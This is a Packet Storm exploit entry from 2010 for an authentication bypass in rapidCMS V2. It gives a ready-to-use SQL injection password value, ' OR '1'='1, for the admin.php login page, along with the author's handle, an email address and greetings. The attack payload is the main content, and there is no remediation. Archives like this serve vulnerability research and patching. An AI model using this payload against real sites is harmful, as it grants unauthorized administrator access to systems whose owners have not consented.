rapidCMS 2 SQL Injection

2010-07-20T00:00:00
ID PACKETSTORM:91972
Type packetstorm
Reporter Mahjong
Modified 2010-07-20T00:00:00

Description

                                        
                                            `# Exploit Title: rapidCMS V2 Authentication Bypass  
# Date: [18/07/2010]  
# Author: Mahjong  
# Software Link: www.rapidcms.de  
# Version: V2  
# Tested on: Linux  
  
* Found by: Mahjong  
* E-Mail: mahjong@phcn.ws  
* Greetings: Puddy, Ancolon  
  
----------------------------------------------------------   
  
Exploit Authentication Bypass:  
  
User: something  
Pass: ' OR '1'='1  
  
----------------------------------------------------------  
  
Demo :  
http://site.tld/admin.php  
  
----------------------------------------------------------  
  
`